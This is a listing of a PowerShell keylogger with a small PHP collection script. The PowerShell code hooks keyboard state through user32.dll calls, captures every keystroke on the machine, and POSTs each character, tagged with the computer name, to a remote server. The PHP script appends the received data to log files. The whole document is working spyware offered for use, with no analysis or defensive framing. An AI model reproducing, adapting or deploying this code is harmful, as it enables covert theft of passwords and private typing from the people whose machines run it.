Powershell HTTP Keylogger

1. # PHP Code for logging of keys
2. # FYI - need to create a keylogs folder for php script to write to
3. #
4. # <?php
5. # $saving = $_REQUEST['saving'];
6. # if ($saving == "1"){
7. # $data = $_POST['data'];
8. # $file = $_POST['filename'];
9. #
10. # $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
11. # fwrite($fp, $data) or die("Couldn't write values to file!");
12. # fclose($fp);
13. # }
14. # ?>
15.  
16.  
17. function KeyLog {
18. $MAPVK_VK_TO_VSC = 0x00
19. $MAPVK_VSC_TO_VK = 0x01
20. $MAPVK_VK_TO_CHAR = 0x02
21. $MAPVK_VSC_TO_VK_EX = 0x03
22. $MAPVK_VK_TO_VSC_EX = 0x04
23. $virtualkc_sig = @'
24. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
25. public static extern short GetAsyncKeyState(int virtualKeyCode);
26. '@
27. $kbstate_sig = @'
28. [DllImport("user32.dll", CharSet=CharSet.Auto)]
29. public static extern int GetKeyboardState(byte[] keystate);
30. '@
31. $mapchar_sig = @'
32. [DllImport("user32.dll", CharSet=CharSet.Auto)]
33. public static extern int MapVirtualKey(uint uCode, int uMapType);
34. '@
35. $tounicode_sig = @'
36. [DllImport("user32.dll", CharSet=CharSet.Auto)]
37. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
38. lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
39. '@
40. $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
41. $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
42. $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
43. $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
44. while ($true) {
45. Start-Sleep -Milliseconds 40
46. $gotit = ""
47. for ($char = 1; $char -le 254; $char++)
48. {$vkey = $char
49. $gotit = $getKeyState::GetAsyncKeyState($vkey)
50. if ($gotit -eq -32767)
51. {$l_shift = $getKeyState::GetAsyncKeyState(160)
52. $r_shift = $getKeyState::GetAsyncKeyState(161)
53. $caps_lock = [console]::CapsLock
54. $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
55. $kbstate = New-Object Byte[] 256
56. $checkkbstate = $getKBState::GetKeyboardState($kbstate)
57. $mychar = New-Object -TypeName "System.Text.StringBuilder";
58. $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
59. if ($unicode_res -gt 0)
60. {$keydate = get-date -format yyyyMMdd
61.  
62. $logfile = "$env:computername-$keydate-keys.txt"
63. $url = "http://myserver/storage/PostKeys.php"
64. $parameters = "saving=1&data=$keys&filename=$logfile"
65.  
66. $keys = $mychar.ToString()
67. $http_request = New-Object -ComObject Msxml2.XMLHTTP
68. $http_request.open('POST', $url, $false)
69. $http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
70. $http_request.setRequestHeader("Content-length", $parameters.length)
71. $http_request.setRequestHeader("Connection", "close")
72. $http_request.send($parameters)
73. }}}}}
74.  
75. KeyLog